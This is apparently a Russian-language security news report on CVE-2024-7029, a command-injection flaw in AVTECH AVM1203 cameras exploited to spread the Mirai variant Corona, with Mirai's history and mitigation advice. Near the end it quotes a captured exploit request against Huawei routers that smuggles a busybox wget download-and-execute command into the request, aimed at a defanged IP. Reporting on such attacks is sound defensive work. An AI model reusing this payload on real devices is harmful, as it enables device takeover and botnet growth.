CVE-2024-7029: 0-day уязвимость в камерах AVTECH возвращает ботнет Mirai в игру

Компания Akamai обнаружила новую волну атак на устаревшие камеры видеонаблюдения тайваньского производителя AVTECH. Злоумышленники эксплуатируют критическую уязвимость в модели AVM1203 для распространения вредоносного ПО семейства Mirai.

Уязвимость, получившая идентификатор CVE-2024-7029, позволяет удаленно выполнять произвольный код на устройстве. Несмотря на то, что проблема известна уже около 5 лет, официально она была признана и зарегистрирована только в этом месяце. Эксперты Akamai зафиксировали активное использование этой бреши хакерами с марта текущего года. Для обнаружения атак исследователи развернули сеть ловушек, имитирующих уязвимые камеры в интернете.

Ботнет Mirai впервые громко заявил о себе в 2016 году, когда с его помощью была осуществлена мощная DDoS-атака на сайт эксперта по кибербезопасности Брайана Кребса. В последующие недели он использовался для атак на интернет-провайдеров и другие цели. Одна из таких атак на DNS-провайдера Dyn привела к масштабным сбоям в работе многих популярных веб-сервисов.

Ситуацию осложнило то, что создатели Mirai опубликовали исходный код вредоноса, что позволило практически любому желающему создавать собственные вариации для проведения DDoS-атак невиданной ранее мощности. По словам Кайла Лефтона, исследователя из команды Akamai по реагированию на угрозы, они наблюдали DDoS-атаки с использованием зараженных камер на "различные организации". При этом пока нет данных о том, что злоумышленники используют камеры для шпионажа или просмотра видеопотока.

Эксплуатируемая уязвимость связана с некорректной обработкой параметра brightness в запросе к файлу /cgi-bin/supervisor/Factory.cgi. Это и позволяет внедрять вредоносные команды. В ходе атаки на устройство загружается JavaScript-файл, который затем скачивает и запускает основную полезную нагрузку - вариант Mirai под названием Corona. После заражения устройства, вредонос пытается распространиться дальше, подключаясь по Telnet к другим хостам. Кроме того, он эксплуатирует ряд других уязвимостей, включая RCE в Hadoop YARN, CVE-2014-8361 и CVE-2017-17215.

Вот пример кода, используемого для эксплуатации уязвимости в маршрутизаторах Huawei:

POST /ctrlt/DeviceUpgrade_1 HTTP/1.1 Content-Length: 430 Connection: keep-alive Accept: */* Authorization: Digest username=\"dslf-config\", realm=\"HuaweiHomeGateway\", nonce=\"88645cefb1f9ede0e336e3569d75ee30\", uri=\"/ctrlt/DeviceUpgrade_1\", response=\"3612f843a42db38f48f59d2a3597e19c\", algorithm=\"MD5\", qop=\"auth\", nc=00000001, cnonce=\"248d1a2560100669\" $(/bin/busybox wget -g 45.14.244[.]89 -l /tmp/mips -r /mips; /bin/busybox chmod 777 * /tmp/mips; /tmp/mips huawei.rep)$(echo HUAWEIUPNP)

Поскольку уязвимая модель камеры AVM1203 больше не поддерживается производителем, эксперты рекомендуют пользователям полностью отказаться от ее использования и заменить на более современные устройства. Кроме того, специалисты в очередной раз напоминают о необходимости изменения стандартных учетных данных на всех подключенных к интернету устройствах.